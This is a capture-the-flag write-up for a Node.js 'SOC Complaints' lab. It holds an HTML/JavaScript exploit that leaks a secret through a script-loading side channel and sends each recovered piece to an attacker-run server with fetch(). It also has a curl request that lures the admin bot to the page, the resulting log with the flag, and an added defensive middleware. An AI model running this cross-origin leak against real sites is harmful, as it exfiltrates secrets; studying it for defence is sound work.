Diefunction

SOC Complaints

IPAddress: 172.20.0.4
Port: 80
URL: http://172.20.0.4/

Description

If you cannot access a website, complain to the SOC team, and the SOC team will investigate.

Structure

.
├── app.js
├── config
│ └── cors.js
├── controllers
│ ├── complaints.js
│ └── manage.js
├── middlewares
│ └── error.js
├── package.json
├── routes
│ ├── complaints.js
│ └── manage.js
├── utils
│ ├── browser.js
│ └── database.js
└── views

Solution

Exploit

Attacker IPAddress

ip addr show docker0
6: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:40:01:c8:b5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:40ff:fe01:c8b5/64 scope link
       valid_lft forever preferred_lft forever
IPv4: 172.17.0.1

Start a web server on the Docker interface with Python

python3 -m http.server 80 -b 172.17.0.1

Content of index.html

<html>
  <head>
    <title>EXPLOIT</title>
  </head>
  <body>
    <script>
      // Candidate characters, tried in order for each position of the secret.
      var alphabets = ' !"#$&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^`{|}~';
      var counter = 0; // index of the character currently being tried
      var secret = '';  // prefix confirmed so far

      // Load the URL as a <script>: onload means the guess was accepted, onerror means it was not.
      const probeError = (url) => {
        let script = document.createElement('script');
        script.src = url;
        script.onload = async () => {
          // The guessed prefix is the value of the second query parameter (secret=...).
          secret = decodeURIComponent(url.split('?')[1].split('&')[1].split('=')[1]);
          // Report the confirmed prefix to the listening web server.
          await fetch(`http://172.17.0.1/${secret}`);
          counter = 0;
          probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
        };
        script.onerror = () => {
          // Wrong guess: move on to the next candidate character.
          counter = counter + 1;
          probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
        };
        document.head.appendChild(script);
      };

      probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
    </script>
  </body>
</html>

Phish the SOC team

curl -X POST -H 'Content-type: application/json' -d '{"url": "http://172.17.0.1/"}' http://172.20.0.4/api/v1/complaints/
{"message":"your request was successfully submitted"}

Flag

└─$ python3 -m http.server 80 -b 172.17.0.1
Serving HTTP on 172.17.0.1 port 80 (http://172.17.0.1:80/) ...
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET / HTTP/1.1" 200 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC%7B HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-E HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-EN HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENO HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOU HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUG HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH%7D HTTP/1.1" 404 -
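
A server-side way to close the `<script>` onload/onerror oracle that index.html relies on, as an added example that is not part of the original write-up or the challenge's source code. `isolateApi` and `simulate` are hypothetical names, the request headers are constructed samples, and the policy assumes the secrets route is only ever called by same-origin fetch/XHR code.

```javascript
// Added example: Connect/Express-style middleware for a sensitive JSON API route.
// Assumption: legitimate callers are same-origin fetch()/XHR requests only.
function isolateApi(req, res, next) {
  // Browser-enforced: refuse to hand this response to cross-origin no-cors
  // loads (<script>, <img>, ...), so a match and a miss both end in onerror.
  res.setHeader('Cross-Origin-Resource-Policy', 'same-origin');
  // Browser-enforced: no MIME sniffing, so a JSON response is rejected as a script.
  res.setHeader('X-Content-Type-Options', 'nosniff');

  // Fetch Metadata request headers. Browsers send them only to HTTPS or
  // localhost origins, so a missing header is tolerated here and the two
  // response headers above remain the baseline control.
  const site = req.headers['sec-fetch-site'];
  const dest = req.headers['sec-fetch-dest'];
  const crossSite = site !== undefined && site !== 'same-origin';
  const embedded = dest !== undefined && dest !== 'empty'; // 'empty' = fetch()/XHR
  if (crossSite || embedded) {
    res.statusCode = 403; // same answer whatever the guessed value was
    return res.end(JSON.stringify({ message: 'forbidden' }));
  }
  next();
}

// Drive the middleware with a constructed request and report the outcome.
function simulate(headers) {
  const out = { status: 200, headers: {}, reachedHandler: false };
  const res = {
    statusCode: 200,
    setHeader: (name, value) => { out.headers[name.toLowerCase()] = value; },
    end: () => { out.status = res.statusCode; },
  };
  isolateApi({ headers }, res, () => { out.reachedHandler = true; });
  return out;
}

// Constructed samples: a cross-site <script> load and a same-origin fetch().
const scriptProbe = simulate({
  'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'no-cors', 'sec-fetch-dest': 'script',
});
const ownFrontend = simulate({
  'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty',
});
console.log('script probe:', scriptProbe.status, 'handler reached:', scriptProbe.reachedHandler);
console.log('own frontend:', ownFrontend.status, 'handler reached:', ownFrontend.reachedHandler);
```

A CORS allow-list alone does not stop this probe, because a `<script>` load is a no-cors request and the page only observes whether it loaded or failed.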

Explanation